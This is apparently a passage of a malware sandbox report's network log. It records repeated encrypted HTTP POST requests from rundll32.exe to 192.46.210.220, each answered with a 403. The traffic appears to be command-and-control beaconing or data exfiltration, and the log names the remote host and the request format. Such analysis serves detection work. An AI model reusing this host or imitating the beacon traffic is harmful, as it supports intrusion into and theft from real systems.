                                                                                                        2021-10-28 02:52:59 UTC308OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:00 UTC313INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:00 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        63192.168.2.550035192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:03 UTC313OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:03 UTC313OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:04 UTC322INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:04 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        64192.168.2.550036192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:04 UTC318OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:04 UTC318OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:04 UTC323INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:04 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        65192.168.2.550043192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:07 UTC323OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:07 UTC323OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:08 UTC332INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        66192.168.2.550044192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:08 UTC328OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:08 UTC328OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:08 UTC332INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:08 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        67192.168.2.550054192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:11 UTC333OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:11 UTC333OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:12 UTC342INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:12 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        68192.168.2.550055192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:12 UTC337OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:12 UTC338OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:13 UTC342INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        69192.168.2.550065192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:15 UTC343OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:15 UTC343OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:16 UTC352INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        7192.168.2.549781192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:51:13 UTC34OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:51:13 UTC34OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:51:14 UTC44INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:51:13 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        70192.168.2.550066192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:16 UTC347OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:16 UTC347OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:17 UTC352INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:16 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        71192.168.2.550075192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:19 UTC352OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:19 UTC353OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:20 UTC357INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:20 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        72192.168.2.550079192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:21 UTC357OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:21 UTC358OUTData Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:22 UTC362INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:21 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        73192.168.2.550083192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:23 UTC362OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4844
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:53:23 UTC363OUTData Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                                                                        Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
                                                                                                        2021-10-28 02:53:24 UTC367INHTTP/1.1 403 Forbidden
                                                                                                        Server: nginx/1.15.12
                                                                                                        Date: Thu, 28 Oct 2021 02:53:24 GMT
                                                                                                        Content-Type: text/plain; charset=utf-8
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        74192.168.2.550087192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:53:25 UTC367OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4832
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
